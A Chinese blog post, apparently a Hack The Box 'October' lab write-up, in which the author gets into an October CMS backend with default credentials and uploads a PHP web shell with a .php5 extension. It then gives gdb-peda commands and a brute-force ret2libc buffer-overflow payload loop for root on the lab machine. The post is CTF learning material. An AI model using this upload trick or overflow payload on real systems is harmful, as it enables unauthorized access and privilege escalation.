Hack the box靶机 October

在这里插入图片描述在这里插入图片描述

搜了一下october
有漏洞
然后默认的后台是/backend
试了一下密码admin:admin
竟然进去了????

在这里插入图片描述

有文件上传功能
shel.php
抓包
改成*.php5
右侧click here
拿到权限

在这里插入图片描述在这里插入图片描述

dirb也扫出来后台了
但是我都已经不需要了
接下来是缓存区溢出了
正在看
所以就写到这吧

看了一晚上+一个白天
算是明白原理以及利用了

在这里插入图片描述

算了,直接贴传送门吧
国外大佬写的靶机教程
很详细

大概就是
1.检查防护
2.查看调用函数
3.通过脚本创造一个字符串(大一点的)
4.找到覆盖EIP的字节
5.通过脚本检查字节所在这个字符串的哪个位置
6.找到地址
7.生成漏洞利用脚本
8.运行得到root权限

安装
1.apt-get install gdb
2.git clone https://github.com/longld/peda.git ~/peda
3.echo "source ~/peda/peda.py" >> ~/.gdbinit
在Kali运行
1.gdb ./ovrflw
2.aslr
3.pdisass main
4.checksec
5.(再打开一个终端)pattern create 150
6.(在gdb运行)r '粘贴生成字符串'
7.(再刚才新打开的终端运行)pattern_offset 0x41384141
然后在靶机上运行
1.gdb /usr/local/bin/ovrflw -q
2.b main
3.run
4.p system
5.find 得到的字符串1, +9999999, “/bin/sh”
6.x/s 得到的字符串2
7.p exit
8.while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done  

对于我现在的知识
解决它还是有点困难
有没有大佬推荐一下缓冲区溢出的学习教程的
奉上双膝

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值